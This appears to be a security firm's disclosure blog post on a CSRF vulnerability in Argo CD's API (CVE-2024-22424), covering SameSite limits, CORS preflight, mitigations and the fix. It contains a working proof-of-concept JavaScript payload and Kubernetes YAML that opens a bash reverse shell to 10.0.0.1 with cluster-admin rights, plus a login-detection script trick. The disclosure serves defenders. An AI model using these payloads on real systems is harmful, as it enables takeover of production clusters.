Argo CD CSRF
Argo CD holds the key to production servers and is a critical component of CI/CD pipelines.
During a recent engagement, we encountered Argo CD. It was hosted on the same parent domain (“same-site”) as another asset we controlled, which got us thinking about client-side attack vectors.
The vulnerability
It has been publicly known for years that the entire Argo CD API is vulnerable to Cross-Site Request Forgery (CSRF). We assume the team hadn't made it a priority because of the lack of evidence that it is a severe vulnerability.
Modern browsers default to the Lax SameSite cookie attribute to prevent CSRF, but it is not foolproof: the SameSite attribute is rendered useless when the attacking origin is on the same parent domain (the same "site") as the target.
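To make the "same-site" notion concrete, here is a toy sketch of the check (our own illustration, not browser code). It assumes the registrable domain is known in advance; real browsers derive it from the Public Suffix List:

```javascript
// Toy same-site check. The registrable domain is passed in explicitly;
// real browsers compute it from the Public Suffix List.
function siteOf(host, registrableDomain) {
  return (host === registrableDomain || host.endsWith('.' + registrableDomain))
    ? registrableDomain
    : host;
}

function isSameSite(hostA, hostB, registrableDomain) {
  return siteOf(hostA, registrableDomain) === siteOf(hostB, registrableDomain);
}

// marketing.victim.com -> argocd.internal.victim.com is same-site,
// so SameSite=Lax cookies are still attached:
console.log(isSameSite('marketing.victim.com',
                       'argocd.internal.victim.com', 'victim.com')); // true
// attacker.com -> argocd.internal.victim.com is cross-site,
// and the cookie is withheld:
console.log(isSameSite('attacker.com',
                       'argocd.internal.victim.com', 'victim.com')); // false
```

This is why SameSite is a defense against cross-site requests only: any subdomain of the same registrable domain sits inside the trust boundary.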
We spun up a sample environment with Argo CD v2.8.2 to test this. In this scenario, an attacker controls the contents of marketing.victim.com (via stored XSS, for example) and wants to target argocd.internal.victim.com.
The following proof of concept lets the attacker create a pod with admin privileges on the Kubernetes cluster via Argo CD. This piece of JavaScript is injected into the marketing.victim.com homepage:
var xhr = new XMLHttpRequest();
xhr.open('POST', 'https://argocd.internal.victim.com/api/v1/applications');
xhr.setRequestHeader('Content-Type', 'text/plain');
xhr.withCredentials = true;
xhr.send('{"apiVersion":"argoproj.io/v1alpha1","kind":"Application","metadata":{"name":"test-app1"},"spec":{"destination":{"name":"","namespace":"default","server":"https://kubernetes.default.svc"},"source":{"path":"argotest1","repoURL":"https://github.com/califio/argotest1","targetRevision":"HEAD"},"sources":[],"project":"default","syncPolicy":{"automated":{"prune":false,"selfHeal":false}}}}')
Here, repoURL points to a repository containing YAML definitions like:
apiVersion: v1
kind: ServiceAccount
metadata:
  name: my-sa
---
apiVersion: v1
kind: Pod
metadata:
  name: my-pod
spec:
  serviceAccountName: my-sa
  containers:
  - name: ubuntu
    image: ubuntu:latest
    command: ["bash", "-c", "bash -i >& /dev/tcp/10.0.0.1/4242 0>&1"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: my-role
rules:
- apiGroups: [""]
  resources: ["*"]
  verbs: ["*"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: my-rolebinding
subjects:
- kind: ServiceAccount
  name: my-sa
  namespace: default
roleRef:
  kind: ClusterRole
  name: my-role
  apiGroup: rbac.authorization.k8s.io
Then we wait. When an employee who is logged in to argocd.internal.victim.com visits marketing.victim.com, the payload fires and the Kubernetes cluster is compromised.
This is made possible because:
Argo CD does not respect the Content-Type header; it parses the body as JSON regardless. If it required "application/json", the cross-origin request would have triggered a CORS preflight and the attack would fail.
The attacker needs zero prior knowledge to craft a valid JSON payload. The cluster location, project name… are available by default.
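The preflight point can be sketched as follows. Per the Fetch standard, only three content types are "CORS-safelisted" and may be sent cross-origin without a preflight; text/plain is one of them, application/json is not:

```javascript
// CORS-safelisted content types per the Fetch standard. Any other value on a
// cross-origin request forces an OPTIONS preflight, which the target server
// must explicitly approve before the real request is sent.
const SAFELISTED = [
  'application/x-www-form-urlencoded',
  'multipart/form-data',
  'text/plain',
];

function needsPreflight(contentType) {
  const mediaType = contentType.split(';')[0].trim().toLowerCase();
  return !SAFELISTED.includes(mediaType);
}

console.log(needsPreflight('text/plain'));       // false — sent directly, cookies attached
console.log(needsPreflight('application/json')); // true  — preflight would stop the attack
```

Since Argo CD accepted a JSON body labeled text/plain, the PoC rides inside a "simple request" and never hits a preflight.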
What’s more, we can make the exploit targeted. From marketing.victim.com, there’s a neat little trick to check whether the current user is logged in to the target Argo CD (idea courtesy of a friend of Calif):
<script src="https://argocd.internal.victim.com/api/v1/projects" onload="alert('Logged in to argocd')" onerror="alert('NOT logged in')"></script>
This works because the API returns 200 for authenticated requests and 403 otherwise.
In reality, we waited until our client announced something on their marketing website. The news drew a large number of employees to the page, and we got a shell almost immediately.
Suggestion
We reported this to Argo CD in September 2023, but have not received a response. Short of a patch, we propose the following mitigations:
Migrate Argo CD off parent domains that do not share the same trust level
Shorten the default session time of 24 hours to 30 minutes or less
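For the second mitigation, Argo CD reads its session duration from the argocd-cm ConfigMap (the users.session.duration key, if we recall the setting correctly); something along these lines:

```yaml
apiVersion: v1
kind: ConfigMap
metadata:
  name: argocd-cm
  namespace: argocd
  labels:
    app.kubernetes.io/part-of: argocd
data:
  # Shorten sessions from the 24h default to limit the CSRF window.
  users.session.duration: "30m"
```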
Update
The Argo CD team has been responsive since this blog post was published and pushed an update several days later. This issue is now CVE-2024-22424 and is fixed in versions 2.9.4, 2.8.8, and 2.7.16.
The initial fix added gorilla/csrf to Argo CD. We felt this was not the right way to address the issue and recommended that they enforce an application/json Content-Type header instead; that became the final fix.
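The idea behind the final fix can be sketched as a simple guard (our illustration in JavaScript; Argo CD itself is written in Go, and this is not its actual code): reject any state-changing request whose Content-Type is not application/json, which forces cross-origin callers into a CORS preflight the server will never approve.

```javascript
// Sketch of the content-type enforcement idea behind the CVE-2024-22424 fix.
// Hypothetical helper, not Argo CD's real implementation.
function isAllowedContentType(contentType) {
  if (!contentType) return false;
  const mediaType = contentType.split(';')[0].trim().toLowerCase();
  return mediaType === 'application/json';
}

console.log(isAllowedContentType('application/json'));                // true
console.log(isAllowedContentType('application/json; charset=utf-8')); // true
console.log(isAllowedContentType('text/plain'));                      // false — request rejected
```

Because application/json is not CORS-safelisted, a browser would preflight any cross-origin request carrying it, so the original PoC can no longer reach the API.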
We extend our thanks to the Argo CD maintainers for their receptiveness to feedback and the smooth remediation process.